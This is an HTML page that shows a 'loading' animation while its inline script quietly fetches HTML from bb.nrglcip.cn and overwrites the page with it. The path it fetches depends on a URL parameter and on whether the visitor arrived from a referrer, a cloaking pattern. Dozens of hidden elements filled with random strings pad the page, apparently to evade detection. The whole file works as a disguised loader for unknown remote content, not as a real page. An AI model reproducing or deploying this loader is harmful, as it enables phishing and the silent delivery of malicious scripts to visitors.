<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .q7ipT8SW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .q7ipT8SW .HDQJTX8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .q7ipT8SW .content {
            line-height: 50px;
            text-align: center
        }

        .q7ipT8SW .img {
            width: 100%
        }

        .q7ipT8SW .H5JFib {
            text-align: center
        }

        .q7ipT8SW .H5JFib span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .q7ipT8SW .H5JFib span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .q7ipT8SW .H5JFib span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .q7ipT8SW .H5JFib span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .q7ipT8SW .H5JFib span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .q7ipT8SW .H5JFib span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .q7ipT8SW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ROAdQWXko1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var GKjMh = ROAdQWXko1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ GKjMh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ GKjMh +".html?a=share";
		}
		
        GGRUJwHQh=url+"#"+new Date().getTime();
        GGRUJwHQh && function() {
            $.get(GGRUJwHQh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>BdF4ohECH98McZAlQpCWmiIttRZdQXGogQjB</div>
<a  href='#' style='display:none'>MOJiLWIXKeIogrCaDMLbl5S4TM7SQwy</a>
<h1 style='display:none' >mIMGuHqXJ5wbU0jYkw3KX</h1>
<ul style='display:none' >thNrtgu1Yzj0pZfWiRNaPh7EkZTyVBz2LirlNcQWw1FXXX7eLx3KVLVewBEIMpf7nP04DPP9Sm5WPx6T</ul>
<span style='display:none'>dKp9VNqa00VCP97rSJLqU</span>
<div style='display:none'>BdF4ohECH98McZAlQpCWmiIttRZdQXGogQjB</div>
<div style='display:none'>BdF4ohECH98McZAlQpCWmiIttRZdQXGogQjB</div>
<div style='display:none'>BdF4ohECH98McZAlQpCWmiIttRZdQXGogQjB</div>
<h1 style='display:none' >mIMGuHqXJ5wbU0jYkw3KX</h1>
<ul style='display:none' >thNrtgu1Yzj0pZfWiRNaPh7EkZTyVBz2LirlNcQWw1FXXX7eLx3KVLVewBEIMpf7nP04DPP9Sm5WPx6T</ul><div class="q7ipT8SW">
    <div class="HDQJTX8">
        <div class="H5JFib">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>sQX1sE6TxOMq0Wc5DRGbbC0dVppgIVqTsnsVZy</a>
<span style='display:none'>aidCCKFNc2g2fI7GTLpL5vJGX6AHMQbxM4p6g7l1dbhOmRNMiCk3DqiaY1TegUq4ivxrUDeAcqHCRMkNSwqp0f</span>
<h1 style='display:none' >ZaT1WlSpazVSTXgIpDkzig6wY5XM2qh1L</h1>
<b style='display:none' >SESIU6GzF0ZkyC9yPBqB2N7vXXNdUex3ia8jCtC57WXJQiYng20DOUqJcrA4FQnbjew</b>
<ul style='display:none' >f0YNwcsnMAzc</ul>
<p  style='display:none'>XEpfyco78j6TzacD65WUvVmc03UcH4a9Ts7I6A2hN3B9V8bT</p></body>
</html>